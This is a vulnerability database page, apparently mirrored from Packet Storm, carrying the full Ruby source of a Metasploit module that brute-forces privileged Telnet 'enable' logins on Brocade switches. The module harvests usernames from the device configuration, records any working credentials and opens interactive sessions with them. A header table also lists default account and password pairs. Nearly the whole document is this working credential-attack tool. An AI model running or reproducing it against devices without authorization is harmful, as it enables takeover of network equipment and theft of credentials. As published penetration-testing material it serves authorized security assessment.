Brocade Enable Login Check Scanner

🗓️ 31 Aug 2024 00:00:00Reported by h00die, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 231 Views

This module tests a range of Brocade network devices for privileged logins and reports the successes. It checks the device authentication mode and tests against specific device models

Reporter	Title	Published	Views	Family All 221
0day.today	SSH User Code Execution Vulnerability	16 May 201300:00	–	zdt
0day.today	Varnish Cache CLI Interface Remote Code Execution Exploit	21 Dec 201400:00	–	zdt
0day.today	SSH - User Code Execution Exploit	23 Mar 201700:00	–	zdt
Tenable Nessus	Unpassworded '4Dgifts' Account	20 Feb 200300:00	–	nessus
Tenable Nessus	Default Password '666666' for '666666' Account	28 Oct 201600:00	–	nessus
Tenable Nessus	Default Password '888888' for '888888' Account	28 Oct 201600:00	–	nessus
Tenable Nessus	Unprotected 'admin' Account	28 Oct 201600:00	–	nessus
Tenable Nessus	Default Password 'password' for 'admin1' Account	28 Oct 201600:00	–	nessus
Tenable Nessus	Default Password '1234' for 'administrator' Account	28 Oct 201600:00	–	nessus
Tenable Nessus	Default Password 'meinsm' for 'Administrator' Account	28 Oct 201600:00	–	nessus

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'metasploit/framework/credential_collection'  
require 'metasploit/framework/login_scanner/telnet'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Telnet  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::AuthBrute  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::CommandShell  
include Msf::Sessions::CreateSessionOptions  
include Msf::Auxiliary::ReportSummary  
  
def initialize  
super(  
'Name' => 'Brocade Enable Login Check Scanner',  
'Description' => %q{  
This module will test a range of Brocade network devices for a  
privileged logins and report successes. The device authentication mode  
must be set as 'aaa authentication enable default local'.  
Telnet authentication, e.g. 'enable telnet authentication', should not  
be enabled in the device configuration.  
  
This module has been tested against the following devices:  
ICX6450-24 SWver 07.4.00bT311,  
FastIron WS 624 SWver 07.2.02fT7e1  
},  
'Author' => 'h00die <mike[at]shorebreaksecurity.com>',  
'References' =>  
[  
[ 'CVE', '1999-0502'] # Weak password  
],  
'License' => MSF_LICENSE  
)  
register_options(  
[  
OptBool.new('GET_USERNAMES_FROM_CONFIG', [ false, 'Pull usernames from config and running config', true])  
], self.class  
)  
  
@no_pass_prompt = []  
end  
  
def get_username_from_config(un_list,ip)  
["config", "running-config"].each do |command|  
print_status(" Attempting username gathering from #{command} on #{ip}")  
sock.puts("\r\n") # ensure that the buffer is clear  
config = sock.recv(1024)  
sock.puts("show #{command}\r\n")  
  
# pull the entire config  
while true do  
sock.puts(" \r\n") # paging  
config << sock.recv(1024)  
# Read until we are back at a prompt and have received the 'end' of  
# the config.  
break if config.match(/>$/) and config.match(/end/)  
end  
  
config.each_line do |un|  
if un.match(/^username/)  
found_username = un.split(" ")[1].strip  
un_list.push(found_username)  
print_status(" Found: #{found_username}@#{ip}")  
end  
end  
end  
end  
  
attr_accessor :no_pass_prompt  
attr_accessor :password_only  
  
def run_host(ip)  
un_list = []  
if datastore['GET_USERNAMES_FROM_CONFIG']  
connect()  
get_username_from_config(un_list,ip)  
disconnect()  
end  
  
if datastore['USERNAME'] #put the provided username on the array to try  
un_list.push(datastore['USERNAME'])  
end  
  
un_list.delete('logout') #logout, even when used as a un or pass will exit the terminal  
  
un_list.each do |un|  
cred_collection = build_credential_collection(  
username: datastore['USERNAME'],  
password: datastore['PASSWORD']  
)  
  
scanner = Metasploit::Framework::LoginScanner::Telnet.new(  
configure_login_scanner(  
host: ip,  
port: rport,  
proxies: datastore['PROXIES'],  
cred_details: cred_collection,  
stop_on_success: datastore['STOP_ON_SUCCESS'],  
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],  
connection_timeout: datastore['Timeout'],  
max_send_size: datastore['TCP::max_send_size'],  
send_delay: datastore['TCP::send_delay'],  
banner_timeout: datastore['TelnetBannerTimeout'],  
telnet_timeout: datastore['TelnetTimeout'],  
pre_login: lambda { |s| raw_send("enable\r\n", s.sock) },  
framework: framework,  
framework_module: self,  
ssl: datastore['SSL'],  
ssl_version: datastore['SSLVersion'],  
ssl_verify_mode: datastore['SSLVerifyMode'],  
ssl_cipher: datastore['SSLCipher'],  
local_port: datastore['CPORT'],  
local_host: datastore['CHOST']  
)  
)  
  
scanner.scan! do |result|  
credential_data = result.to_h  
credential_data.merge!(  
module_fullname: self.fullname,  
workspace_id: myworkspace_id  
)  
  
if result.success?  
credential_core = create_credential(credential_data)  
credential_data[:core] = credential_core  
create_credential_login(credential_data)  
print_good("#{ip}:#{rport} - Login Successful: #{result.credential}")  
start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner)  
else  
invalidate_login(credential_data)  
print_error("#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})")  
end  
end  
end  
end  
  
def start_telnet_session(host, port, user, pass, scanner)  
print_status("Attempting to start session #{host}:#{port} with #{user}:#{pass}")  
merge_me = {  
'USERPASS_FILE' => nil,  
'USER_FILE' => nil,  
'PASS_FILE' => nil,  
'USERNAME' => user,  
'PASSWORD' => pass  
}  
  
start_session(self, "TELNET #{user}:#{pass} (#{host}:#{port})", merge_me, true, scanner.sock) if datastore['CreateSession']  
end  
end  
`

31 Aug 2024 00:00Current

7.2High risk

Vulners AI Score7.2

EPSS0.37089